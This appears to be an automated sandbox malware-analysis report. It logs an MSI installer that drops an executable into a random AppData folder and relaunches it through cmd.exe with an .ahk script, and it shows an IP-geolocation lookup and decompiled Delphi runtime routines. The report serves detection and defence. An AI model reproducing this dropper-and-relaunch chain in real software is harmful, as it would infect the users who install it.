36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 38 30 30 35 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 6d 69 73 73 69 6e 67 61 75 74 68 22 0a 7d Data Ascii: { "ip": "84.17.52.45", "hostname": "unn-84-17-52-45.cdn77.com", "city": "Zrich", "region": "Zurich", "country": "CH", "loc": "47.3876,8.5207", "org": "AS60068 Datacamp Limited", "postal": "8005", "timezone": "Europe/Zurich", "readme": "https://ipinfo.io/missingauth"}

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exe PID: 7028 Parent PID: 5344

General

Start time:	14:43:38
Start date:	03/11/2021
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\C003I7GF0S8F920G600203.msi"
Imagebase:	0x7ff777c90000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 7072 Parent PID: 568

General

Start time:	14:43:39
Start date:	03/11/2021
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff777c90000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 4944 Parent PID: 7072

General

Start time:	14:43:41
Start date:	03/11/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding C48C9974BE223117E013BA6B02E31CE9
Imagebase:	0x1170000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nMv8.exe PID: 6680 Parent PID: 4944

General

Start time:	14:44:44
Start date:	03/11/2021
Path:	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe
Imagebase:	0x400000
File size:	905728 bytes
MD5 hash:	01F601DA6304451E0BC17CF004C97C43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	moderate

Chronological Activities

Analysis Process: WerFault.exe PID: 6604 Parent PID: 4944

General

Start time:	14:44:55
Start date:	03/11/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 844
Imagebase:	0x1380000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1500 Parent PID: 3424

General

Start time:	14:45:02
Start date:	03/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5228 Parent PID: 1500

General

Start time:	14:45:02
Start date:	03/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nMv8.exe PID: 2388 Parent PID: 1500

General

Start time:	14:45:03
Start date:	03/11/2021
Path:	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Imagebase:	0x400000
File size:	905728 bytes
MD5 hash:	01F601DA6304451E0BC17CF004C97C43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1556 Parent PID: 3424

General

Start time:	14:45:11
Start date:	03/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6108 Parent PID: 1556

General

Start time:	14:45:12
Start date:	03/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nMv8.exe PID: 3716 Parent PID: 1556

General

Start time:	14:45:12
Start date:	03/11/2021
Path:	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Imagebase:	0x400000
File size:	905728 bytes
MD5 hash:	01F601DA6304451E0BC17CF004C97C43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: msiexec.exe PID: 4944 Parent PID: 7072 msiexec.exeCOMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.2%
Total number of Nodes:	742
Total number of Limit Nodes:	17

Executed Functions

Function 049DD8D8, Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E049DD8D8(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E049DA00C(_v8);
				_push(_t61);
				_push(0x49dd998);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L049D51DC();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E049DAC88( &_v20, 4,  &_v16);
				E049DAE38(_t44, _v20, _v8);
				_t29 = E049DD788( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E049DAC88( &_v24, 4,  &_v16);
					E049DAE38(_t44, _v24, _v8);
					_t40 = E049DD788( *_t44, _t44); // executed
					if(_t40 == 0) {
						E049D9F28(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E049DD99F);
				E049D9F88( &_v24, 2);
				return E049D9F28( &_v8);
			}

0x049dd8de
0x049dd8e1
0x049dd8e4
0x049dd8e7
0x049dd8e9
0x049dd8ef
0x049dd8f6
0x049dd8f7
0x049dd8fc
0x049dd8ff
0x049dd904
0x049dd90a
0x049dd913
0x049dd923
0x049dd930
0x049dd937
0x049dd93e
0x049dd940
0x049dd951
0x049dd95e
0x049dd965
0x049dd96c
0x049dd970
0x049dd970
0x049dd96c
0x049dd977
0x049dd97a
0x049dd97d
0x049dd98a
0x049dd997

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,049DD998,?,?), ref: 049DD90A
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,049DD998,?,?), ref: 049DD913

Part of subcall function 049DD788: FindFirstFileW.KERNEL32(00000000,?,00000000,049DD7E6,?,?), ref: 049DD7BB
Part of subcall function 049DD788: FindClose.KERNEL32(00000000,00000000,?,00000000,049DD7E6,?,?), ref: 049DD7CB

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 36b313605caa0361948d78694998b742208fe804c15457d19afa40dd09d95ad2
Instruction ID: e32150ea96de56a2758236e3e87deadc27de7cb3b9846ae3ef75406aabb060f1
Opcode Fuzzy Hash: 36b313605caa0361948d78694998b742208fe804c15457d19afa40dd09d95ad2
Instruction Fuzzy Hash: DF1154B4A00209ABEB04EFA4C981AADB3B8EFC9314F9085759504E7290DB707F058765

Uniqueness

Uniqueness Score: -1.00%

Function 049DD788, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E049DD788(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E049DA00C(_v8);
				_push(_t27);
				_push(0x49dd7e6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E049DABD0(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E049DD7ED);
				return E049D9F28( &_v8);
			}

0x049dd791
0x049dd792
0x049dd798
0x049dd79f
0x049dd7a0
0x049dd7a5
0x049dd7a8
0x049dd7bb
0x049dd7c8
0x049dd7cb
0x049dd7cb
0x049dd7d2
0x049dd7d5
0x049dd7d8
0x049dd7e5

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,049DD7E6,?,?), ref: 049DD7BB
FindClose.KERNEL32(00000000,00000000,?,00000000,049DD7E6,?,?), ref: 049DD7CB

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: b4f661e5a39d0b24e6ccca8687d04ed6d12544cd1eaab53e2e889f6fe16e7185
Instruction ID: 699e98d6307db75855252ad4cbb3034425e0549b7e22dabe4d9ff7dbb1997c4d
Opcode Fuzzy Hash: b4f661e5a39d0b24e6ccca8687d04ed6d12544cd1eaab53e2e889f6fe16e7185
Instruction Fuzzy Hash: 19F082B1544604AFEB10FB78CD51D9DB3ACEBC9228B9189B1E404D3590EB34BE10A914

Uniqueness

Uniqueness Score: -1.00%

Function 049DF7A8, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049DF7A8() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}

0x049df7ac
0x049df7b8

APIs

GetSystemInfo.KERNEL32 ref: 049DF7AC

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0daa38c3aa15e7342a8b3c36719b6ef52fc0b490fe3b4f1c08026042334b1653
Instruction ID: 8d669d4d2d2fa59dbd080f35909a59e9c9f7ea8b0a38f73ec0f4499164a0b806
Opcode Fuzzy Hash: 0daa38c3aa15e7342a8b3c36719b6ef52fc0b490fe3b4f1c08026042334b1653
Instruction Fuzzy Hash: 92A012504084001AC804EB184C8240B718019C0124FC4022064AC99281E605956C43D7

Uniqueness

Uniqueness Score: -1.00%

Function 049D9B84, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E049D9B84(void* __ecx) {
				long _v4;
				int _t3;
				void* _t9;

				if( *0x4c9005c == 0) {
					if( *0x4c80032 == 0) {
						_t3 = MessageBoxA(0, "Runtime error 217 at 04BE070B", "Error", 0); // executed
					}
					return _t3;
				} else {
					if( *0x4c90348 == 0xd7b2 &&  *0x4c90350 > 0) {
						 *0x4c90360();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error 217 at 04BE070B", 0x1d,  &_v4, 0);
					_t9 = E049DA8D8(0x49d9c18);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}

0x049d9b8c
0x049d9bf2
0x049d9c02
0x049d9c02
0x049d9c08
0x049d9b8e
0x049d9b97
0x049d9ba7
0x049d9ba7
0x049d9bc3
0x049d9bd6
0x049d9bea
0x049d9bea

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027), ref: 049D9BBD
WriteFile.KERNEL32(00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?,049D9D56,049D6FC7,049D700E,?,?), ref: 049D9BC3
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?), ref: 049D9BDE
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?), ref: 049D9BE4
MessageBoxA.USER32(00000000,Runtime error 217 at 04BE070B,Error,00000000), ref: 049D9C02

Strings

Error, xrefs: 049D9BF6
Runtime error 217 at 04BE070B, xrefs: 049D9BB6, 049D9BFB

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error 217 at 04BE070B
API String ID: 1570097196-1474984851
Opcode ID: 5309621d95c333283ce9ca948d5a87613dd6a0286dd707a5015bb7c213918638
Instruction ID: 58c0b617286de6e136285fec64467ff05d420e1fc70ef3b19d82a3b699e41f22
Opcode Fuzzy Hash: 5309621d95c333283ce9ca948d5a87613dd6a0286dd707a5015bb7c213918638
Instruction Fuzzy Hash: 53F09CE56443447EFA2077659C4AF69365CAB80F2DF16813AB318798C0D6E87C84C761

Uniqueness

Uniqueness Score: -1.00%

Function 049D5D18, Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E049D5D18(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4c9005d; // 0x1
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E049D56F4();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4c92b7c = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4c9098d;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4c9005d; // 0x1
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4c90aec], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4c9098d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4c90aec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E049D556C(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E049D556C(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4c90af4 - 0x13ffe0;
							if( *0x4c90af4 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E049D560C(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4c90af4 = 0x13ffe0;
								 *0x4c90af0 = _t82;
								 *0x4c90aec = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4c90aec = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E049D55AC(_t106, _t88, _t81);
							 *0x4c90aec = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x049d5d18
0x049d5d18
0x049d5d21
0x049d5d27
0x049d5e10
0x049d5e13
0x049d5f00
0x049d5f01
0x049d5f04
0x049d57a4
0x049d57a6
0x049d57a8
0x049d57ad
0x049d57b0
0x049d57b5
0x049d57b9
0x049d57bf
0x049d57c3
0x049d57c9
0x049d57e5
0x049d57e9
0x049d57ec
0x049d57ec
0x049d57ee
0x049d57f6
0x049d5803
0x049d5808
0x049d580a
0x049d580c
0x049d580f
0x049d580f
0x049d5811
0x049d5815
0x049d5817
0x049d5819
0x049d581b
0x00000000
0x049d581b
0x00000000
0x049d5817
0x049d57cb
0x049d57d3
0x049d57da
0x049d57e0
0x049d57dc
0x049d57dc
0x049d57dc
0x049d57da
0x049d581f
0x049d5821
0x049d582a
0x049d5833
0x049d5833
0x049d5836
0x049d5846
0x049d5f0a
0x049d5f0f
0x049d5f0f
0x00000000
0x00000000
0x00000000
0x049d5d2d
0x049d5d2d
0x049d5d2f
0x049d5d31
0x049d5d94
0x049d5d94
0x049d5d99
0x049d5d9d
0x00000000
0x00000000
0x049d5d9f
0x049d5da1
0x049d5da8
0x00000000
0x049d5daa
0x049d5dae
0x049d5db3
0x049d5db4
0x049d5db5
0x049d5dba
0x049d5dbe
0x049d5dc8
0x049d5dcd
0x049d5dce
0x00000000
0x049d5dce
0x049d5dbe
0x00000000
0x049d5da8
0x049d5d94
0x049d5d33
0x049d5d33
0x049d5d33
0x049d5d33
0x049d5d37
0x049d5d3a
0x049d5d68
0x049d5d6a
0x049d5d7f
0x049d5d7f
0x049d5d6c
0x049d5d6c
0x049d5d6f
0x049d5d72
0x049d5d75
0x049d5d78
0x049d5d7a
0x049d5d7d
0x00000000
0x00000000
0x049d5d7d
0x049d5d82
0x049d5d84
0x049d5d86
0x049d5d89
0x049d5e19
0x049d5e1c
0x049d5e1e
0x049d5e20
0x049d5e21
0x049d5e23
0x049d5dd4
0x049d5dd4
0x049d5dd9
0x049d5de1
0x00000000
0x00000000
0x049d5de3
0x049d5de5
0x049d5dec
0x00000000
0x049d5dee
0x049d5df0
0x049d5df5
0x049d5dfa
0x049d5e02
0x049d5e06
0x00000000
0x049d5e06
0x049d5e02
0x00000000
0x049d5dec
0x049d5dd4
0x049d5e25
0x049d5e25
0x049d5e2d
0x049d5e31
0x049d5e68
0x049d5e6b
0x049d5e6e
0x049d5e70
0x049d5e76
0x049d5e78
0x049d5e78
0x049d5e33
0x049d5e33
0x049d5e33
0x049d5e36
0x049d5e36
0x049d5e3a
0x049d5e3e
0x049d5e80
0x049d5e83
0x049d5e85
0x049d5e87
0x049d5e8d
0x049d5e91
0x049d5e91
0x049d5e8d
0x049d5e40
0x049d5e46
0x049d5e98
0x049d5ea2
0x049d5ed0
0x049d5ed6
0x049d5edb
0x049d5ee2
0x049d5eec
0x049d5ef2
0x049d5ef9
0x049d5efd
0x049d5ea4
0x049d5ea4
0x049d5ea7
0x049d5ea9
0x049d5eac
0x049d5eaf
0x049d5eb1
0x049d5ec0
0x049d5ec5
0x049d5ec8
0x049d5ecc
0x049d5ecc
0x049d5e48
0x049d5e4b
0x049d5e4e
0x049d5e56
0x049d5e5b
0x049d5e62
0x049d5e66
0x049d5e66
0x049d5d3c
0x049d5d3c
0x049d5d3e
0x049d5d44
0x049d5d47
0x049d5d50
0x049d5d53
0x049d5d56
0x049d5d59
0x049d5d5c
0x049d5d5f
0x049d5d62
0x049d5d62
0x049d5d64
0x049d5d65
0x049d5d49
0x049d5d49
0x049d5d49
